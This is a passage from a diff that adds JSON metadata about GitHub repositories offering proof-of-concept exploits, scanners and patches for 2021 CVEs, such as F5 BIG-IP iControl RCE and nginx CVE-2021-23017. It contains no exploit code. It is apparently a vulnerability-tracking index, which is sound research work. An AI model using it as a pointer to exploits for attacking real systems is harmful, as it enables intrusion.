diff --git a/2021/CVE-2021-22986.json b/2021/CVE-2021-22986.json
new file mode 100644
index 0000000000..6798880ade
--- /dev/null
+++ b/2021/CVE-2021-22986.json
@@ -0,0 +1,457 @@
+[
+ {
+ "id": 348585275,
+ "name": "CVE-2021-22986-Poc",
+ "full_name": "dorkerdevil\/CVE-2021-22986-Poc",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-22986-Poc",
+ "description": "This is a Poc for BIGIP iControl unauth RCE ",
+ "fork": false,
+ "created_at": "2021-03-17T05:02:45Z",
+ "updated_at": "2023-09-28T11:25:52Z",
+ "pushed_at": "2021-03-17T05:10:03Z",
+ "stargazers_count": 51,
+ "watchers_count": 51,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 51,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 349525234,
+ "name": "f5_rce_poc",
+ "full_name": "S1xHcL\/f5_rce_poc",
+ "owner": {
+ "login": "S1xHcL",
+ "id": 47764705,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47764705?v=4",
+ "html_url": "https:\/\/github.com\/S1xHcL"
+ },
+ "html_url": "https:\/\/github.com\/S1xHcL\/f5_rce_poc",
+ "description": "cve-2021-22986 f5 rce 漏洞批量检测 poc",
+ "fork": false,
+ "created_at": "2021-03-19T18:50:22Z",
+ "updated_at": "2023-09-28T11:25:56Z",
+ "pushed_at": "2021-03-27T10:02:59Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 349660227,
+ "name": "westone-CVE-2021-22986-scanner",
+ "full_name": "Osyanina\/westone-CVE-2021-22986-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-22986-scanner",
+ "description": "A vulnerability scanner that detects CVE-2021-22986 vulnerabilities.",
+ "fork": false,
+ "created_at": "2021-03-20T07:45:38Z",
+ "updated_at": "2021-03-20T07:46:00Z",
+ "pushed_at": "2021-03-21T03:39:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 349903906,
+ "name": "CVE-2021-22986-SSRF2RCE",
+ "full_name": "Udyz\/CVE-2021-22986-SSRF2RCE",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2021-22986-SSRF2RCE",
+ "description": "F5 BIG-IP\/BIG-IQ iControl Rest API SSRF to RCE",
+ "fork": false,
+ "created_at": "2021-03-21T04:58:17Z",
+ "updated_at": "2023-11-20T06:14:31Z",
+ "pushed_at": "2021-03-24T11:49:37Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 349930753,
+ "name": "F5_RCE",
+ "full_name": "safesword\/F5_RCE",
+ "owner": {
+ "login": "safesword",
+ "id": 79968310,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79968310?v=4",
+ "html_url": "https:\/\/github.com\/safesword"
+ },
+ "html_url": "https:\/\/github.com\/safesword\/F5_RCE",
+ "description": "CVE-2021-22986 F5 BIG-IP iControl 命令执行漏洞",
+ "fork": false,
+ "created_at": "2021-03-21T07:40:51Z",
+ "updated_at": "2022-08-13T08:25:58Z",
+ "pushed_at": "2021-03-21T07:40:59Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-22986"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 350243656,
+ "name": "CVE-2021-22986",
+ "full_name": "Al1ex\/CVE-2021-22986",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-22986",
+ "description": "CVE-2021-22986 & F5 BIG-IP RCE",
+ "fork": false,
+ "created_at": "2021-03-22T07:13:50Z",
+ "updated_at": "2024-03-06T02:46:55Z",
+ "pushed_at": "2021-04-03T12:56:37Z",
+ "stargazers_count": 90,
+ "watchers_count": 90,
+ "has_discussions": false,
+ "forks_count": 33,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-22986",
+ "f5-bigip"
+ ],
+ "visibility": "public",
+ "forks": 33,
+ "watchers": 90,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 350261633,
+ "name": "CVE-2021-22986",
+ "full_name": "kiri-48\/CVE-2021-22986",
+ "owner": {
+ "login": "kiri-48",
+ "id": 43057210,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43057210?v=4",
+ "html_url": "https:\/\/github.com\/kiri-48"
+ },
+ "html_url": "https:\/\/github.com\/kiri-48\/CVE-2021-22986",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-22T08:19:11Z",
+ "updated_at": "2023-06-01T09:18:39Z",
+ "pushed_at": "2021-03-22T08:32:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 350550235,
+ "name": "CVE-2021-22986_Check",
+ "full_name": "ZephrFish\/CVE-2021-22986_Check",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2021-22986_Check",
+ "description": "CVE-2021-22986 Checker Script in Python3",
+ "fork": false,
+ "created_at": "2021-03-23T02:04:39Z",
+ "updated_at": "2023-09-28T11:26:04Z",
+ "pushed_at": "2021-03-23T02:07:30Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 351650917,
+ "name": "CVE-202122986-EXP",
+ "full_name": "yaunsky\/CVE-202122986-EXP",
+ "owner": {
+ "login": "yaunsky",
+ "id": 48243087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4",
+ "html_url": "https:\/\/github.com\/yaunsky"
+ },
+ "html_url": "https:\/\/github.com\/yaunsky\/CVE-202122986-EXP",
+ "description": "F5 BIG-IP远程代码执行;cve-2021-22986,批量检测;命令执行利用",
+ "fork": false,
+ "created_at": "2021-03-26T03:32:06Z",
+ "updated_at": "2024-05-21T08:26:53Z",
+ "pushed_at": "2021-03-26T05:09:54Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 352531717,
+ "name": "CVE-2021-22986",
+ "full_name": "Tas9er\/CVE-2021-22986",
+ "owner": {
+ "login": "Tas9er",
+ "id": 57090266,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57090266?v=4",
+ "html_url": "https:\/\/github.com\/Tas9er"
+ },
+ "html_url": "https:\/\/github.com\/Tas9er\/CVE-2021-22986",
+ "description": "Code By:Tas9er \/ F5 BIG-IP 远程命令执行漏洞",
+ "fork": false,
+ "created_at": "2021-03-29T05:56:21Z",
+ "updated_at": "2024-05-21T07:23:52Z",
+ "pushed_at": "2021-03-29T05:58:51Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 352644816,
+ "name": "CVE-2021-22986",
+ "full_name": "dotslashed\/CVE-2021-22986",
+ "owner": {
+ "login": "dotslashed",
+ "id": 73475291,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73475291?v=4",
+ "html_url": "https:\/\/github.com\/dotslashed"
+ },
+ "html_url": "https:\/\/github.com\/dotslashed\/CVE-2021-22986",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-29T13:01:08Z",
+ "updated_at": "2021-03-29T13:04:49Z",
+ "pushed_at": "2021-03-29T13:04:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 476541451,
+ "name": "CVE-2021-22986",
+ "full_name": "DDestinys\/CVE-2021-22986",
+ "owner": {
+ "login": "DDestinys",
+ "id": 73631761,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73631761?v=4",
+ "html_url": "https:\/\/github.com\/DDestinys"
+ },
+ "html_url": "https:\/\/github.com\/DDestinys\/CVE-2021-22986",
+ "description": "BIGIP F5",
+ "fork": false,
+ "created_at": "2022-04-01T02:02:33Z",
+ "updated_at": "2022-04-01T02:03:21Z",
+ "pushed_at": "2022-04-01T02:03:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 497326298,
+ "name": "F5-BIG-IP-POC",
+ "full_name": "west9b\/F5-BIG-IP-POC",
+ "owner": {
+ "login": "west9b",
+ "id": 103512651,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103512651?v=4",
+ "html_url": "https:\/\/github.com\/west9b"
+ },
+ "html_url": "https:\/\/github.com\/west9b\/F5-BIG-IP-POC",
+ "description": "CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合",
+ "fork": false,
+ "created_at": "2022-05-28T13:30:22Z",
+ "updated_at": "2023-09-13T08:48:13Z",
+ "pushed_at": "2022-07-30T00:16:29Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 598562860,
+ "name": "CVE-2021-22986",
+ "full_name": "amitlttwo\/CVE-2021-22986",
+ "owner": {
+ "login": "amitlttwo",
+ "id": 55759090,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4",
+ "html_url": "https:\/\/github.com\/amitlttwo"
+ },
+ "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2021-22986",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-07T11:19:20Z",
+ "updated_at": "2023-02-07T11:27:49Z",
+ "pushed_at": "2023-02-07T11:32:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736466953,
+ "name": "CVE-2021-22986",
+ "full_name": "huydung26\/CVE-2021-22986",
+ "owner": {
+ "login": "huydung26",
+ "id": 78777301,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78777301?v=4",
+ "html_url": "https:\/\/github.com\/huydung26"
+ },
+ "html_url": "https:\/\/github.com\/huydung26\/CVE-2021-22986",
+ "description": "Custom POC of CVE-2021-22986 by Al1ex@Heptagram",
+ "fork": false,
+ "created_at": "2023-12-28T01:49:24Z",
+ "updated_at": "2023-12-28T01:50:07Z",
+ "pushed_at": "2023-12-28T01:50:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23017.json b/2021/CVE-2021-23017.json
new file mode 100644
index 0000000000..61663055f6
--- /dev/null
+++ b/2021/CVE-2021-23017.json
@@ -0,0 +1,125 @@
+[
+ {
+ "id": 439285309,
+ "name": "nginx-patch",
+ "full_name": "niandy\/nginx-patch",
+ "owner": {
+ "login": "niandy",
+ "id": 8412769,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8412769?v=4",
+ "html_url": "https:\/\/github.com\/niandy"
+ },
+ "html_url": "https:\/\/github.com\/niandy\/nginx-patch",
+ "description": "nginx 1.15.10 patch against cve-2021-23017 (ingress version)",
+ "fork": false,
+ "created_at": "2021-12-17T09:53:39Z",
+ "updated_at": "2021-12-22T08:15:05Z",
+ "pushed_at": "2021-12-17T11:53:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 508934873,
+ "name": "CVE-2021-23017-PoC",
+ "full_name": "M507\/CVE-2021-23017-PoC",
+ "owner": {
+ "login": "M507",
+ "id": 38591075,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4",
+ "html_url": "https:\/\/github.com\/M507"
+ },
+ "html_url": "https:\/\/github.com\/M507\/CVE-2021-23017-PoC",
+ "description": "PoC for Nginx 0.6.18 - 1.20.0 Memory Overwrite Vulnerability CVE-2021-23017",
+ "fork": false,
+ "created_at": "2022-06-30T04:39:58Z",
+ "updated_at": "2024-06-21T04:56:20Z",
+ "pushed_at": "2023-11-12T16:29:03Z",
+ "stargazers_count": 85,
+ "watchers_count": 85,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 85,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 668565009,
+ "name": "CVE-2021-23017-PoC",
+ "full_name": "lakshit1212\/CVE-2021-23017-PoC",
+ "owner": {
+ "login": "lakshit1212",
+ "id": 140044978,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140044978?v=4",
+ "html_url": "https:\/\/github.com\/lakshit1212"
+ },
+ "html_url": "https:\/\/github.com\/lakshit1212\/CVE-2021-23017-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-20T05:39:01Z",
+ "updated_at": "2023-08-22T23:46:40Z",
+ "pushed_at": "2023-07-20T05:43:03Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707950575,
+ "name": "CVE-2021-23017",
+ "full_name": "ShivamDey\/CVE-2021-23017",
+ "owner": {
+ "login": "ShivamDey",
+ "id": 87941867,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87941867?v=4",
+ "html_url": "https:\/\/github.com\/ShivamDey"
+ },
+ "html_url": "https:\/\/github.com\/ShivamDey\/CVE-2021-23017",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-21T04:24:02Z",
+ "updated_at": "2023-10-21T04:25:17Z",
+ "pushed_at": "2023-10-21T04:25:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2302.json b/2021/CVE-2021-2302.json
new file mode 100644
index 0000000000..198f886970
--- /dev/null
+++ b/2021/CVE-2021-2302.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 407084740,
+ "name": "CVE-2021-2302",
+ "full_name": "quynhle7821\/CVE-2021-2302",
+ "owner": {
+ "login": "quynhle7821",
+ "id": 34308443,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34308443?v=4",
+ "html_url": "https:\/\/github.com\/quynhle7821"
+ },
+ "html_url": "https:\/\/github.com\/quynhle7821\/CVE-2021-2302",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-16T08:27:30Z",
+ "updated_at": "2023-09-28T11:31:29Z",
+ "pushed_at": "2021-09-16T08:49:16Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23132.json b/2021/CVE-2021-23132.json
new file mode 100644
index 0000000000..f56efaf0a8
--- /dev/null
+++ b/2021/CVE-2021-23132.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 343973725,
+ "name": "CVE-2021-23132",
+ "full_name": "HoangKien1020\/CVE-2021-23132",
+ "owner": {
+ "login": "HoangKien1020",
+ "id": 24661746,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4",
+ "html_url": "https:\/\/github.com\/HoangKien1020"
+ },
+ "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2021-23132",
+ "description": "com_media allowed paths that are not intended for image uploads to RCE",
+ "fork": false,
+ "created_at": "2021-03-03T02:13:57Z",
+ "updated_at": "2024-02-20T07:02:34Z",
+ "pushed_at": "2021-03-03T03:52:10Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 30,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 30,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23358.json b/2021/CVE-2021-23358.json
new file mode 100644
index 0000000000..889b7a6a4b
--- /dev/null
+++ b/2021/CVE-2021-23358.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 606530843,
+ "name": "Detection-script-for-cve-2021-23358",
+ "full_name": "EkamSinghWalia\/Detection-script-for-cve-2021-23358",
+ "owner": {
+ "login": "EkamSinghWalia",
+ "id": 106553324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4",
+ "html_url": "https:\/\/github.com\/EkamSinghWalia"
+ },
+ "html_url": "https:\/\/github.com\/EkamSinghWalia\/Detection-script-for-cve-2021-23358",
+ "description": "Detection script for cve-2021-23358",
+ "fork": false,
+ "created_at": "2023-02-25T19:12:13Z",
+ "updated_at": "2023-02-28T13:18:09Z",
+ "pushed_at": "2023-02-25T19:16:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23383.json b/2021/CVE-2021-23383.json
new file mode 100644
index 0000000000..be8a744796
--- /dev/null
+++ b/2021/CVE-2021-23383.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 380873715,
+ "name": "Check-CVE-2021-23383",
+ "full_name": "dn9uy3n\/Check-CVE-2021-23383",
+ "owner": {
+ "login": "dn9uy3n",
+ "id": 21336403,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21336403?v=4",
+ "html_url": "https:\/\/github.com\/dn9uy3n"
+ },
+ "html_url": "https:\/\/github.com\/dn9uy3n\/Check-CVE-2021-23383",
+ "description": "Check the conditions for exploiting CVE-2021-23383 through the handlebars library version assessment.",
+ "fork": false,
+ "created_at": "2021-06-28T01:29:31Z",
+ "updated_at": "2023-09-28T11:29:04Z",
+ "pushed_at": "2021-06-28T01:34:32Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23410.json b/2021/CVE-2021-23410.json
new file mode 100644
index 0000000000..10496106d1
--- /dev/null
+++ b/2021/CVE-2021-23410.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 388965552,
+ "name": "msgpack-CVE-2021-23410-test",
+ "full_name": "azu\/msgpack-CVE-2021-23410-test",
+ "owner": {
+ "login": "azu",
+ "id": 19714,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19714?v=4",
+ "html_url": "https:\/\/github.com\/azu"
+ },
+ "html_url": "https:\/\/github.com\/azu\/msgpack-CVE-2021-23410-test",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-24T01:05:02Z",
+ "updated_at": "2021-07-24T07:08:19Z",
+ "pushed_at": "2021-07-24T01:19:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23758.json b/2021/CVE-2021-23758.json
new file mode 100644
index 0000000000..0c9eaab9fe
--- /dev/null
+++ b/2021/CVE-2021-23758.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 438682864,
+ "name": "CVE-2021-23758-POC",
+ "full_name": "numanturle\/CVE-2021-23758-POC",
+ "owner": {
+ "login": "numanturle",
+ "id": 7007951,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4",
+ "html_url": "https:\/\/github.com\/numanturle"
+ },
+ "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-23758-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T15:40:45Z",
+ "updated_at": "2023-11-01T04:58:01Z",
+ "pushed_at": "2021-12-15T16:37:09Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23840.json b/2021/CVE-2021-23840.json
new file mode 100644
index 0000000000..b820ff5b15
--- /dev/null
+++ b/2021/CVE-2021-23840.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 689968197,
+ "name": "openssl-1.1.1g_CVE-2021-23840",
+ "full_name": "Trinadh465\/openssl-1.1.1g_CVE-2021-23840",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/openssl-1.1.1g_CVE-2021-23840",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-11T09:24:54Z",
+ "updated_at": "2023-09-11T09:27:35Z",
+ "pushed_at": "2023-09-11T09:27:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-23841.json b/2021/CVE-2021-23841.json
new file mode 100644
index 0000000000..c82fea16c9
--- /dev/null
+++ b/2021/CVE-2021-23841.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 486927382,
+ "name": "external_boringssl_openssl_1.1.0g_CVE-2021-23841",
+ "full_name": "Trinadh465\/external_boringssl_openssl_1.1.0g_CVE-2021-23841",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/external_boringssl_openssl_1.1.0g_CVE-2021-23841",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T10:16:14Z",
+ "updated_at": "2023-03-24T01:15:16Z",
+ "pushed_at": "2022-04-29T11:21:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 521602618,
+ "name": "Openssl_1_1_0_CVE-2021-23841",
+ "full_name": "Satheesh575555\/Openssl_1_1_0_CVE-2021-23841",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/Openssl_1_1_0_CVE-2021-23841",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-08-05T10:52:16Z",
+ "updated_at": "2023-03-24T01:14:26Z",
+ "pushed_at": "2022-08-05T10:55:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2394.json b/2021/CVE-2021-2394.json
new file mode 100644
index 0000000000..ef7dfd3a57
--- /dev/null
+++ b/2021/CVE-2021-2394.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 391792707,
+ "name": "CVE-2021-2394",
+ "full_name": "lz2y\/CVE-2021-2394",
+ "owner": {
+ "login": "lz2y",
+ "id": 55266300,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55266300?v=4",
+ "html_url": "https:\/\/github.com\/lz2y"
+ },
+ "html_url": "https:\/\/github.com\/lz2y\/CVE-2021-2394",
+ "description": "POC of CVE-2021-2394",
+ "fork": false,
+ "created_at": "2021-08-02T02:22:04Z",
+ "updated_at": "2024-06-20T02:13:30Z",
+ "pushed_at": "2021-10-28T14:32:31Z",
+ "stargazers_count": 40,
+ "watchers_count": 40,
+ "has_discussions": false,
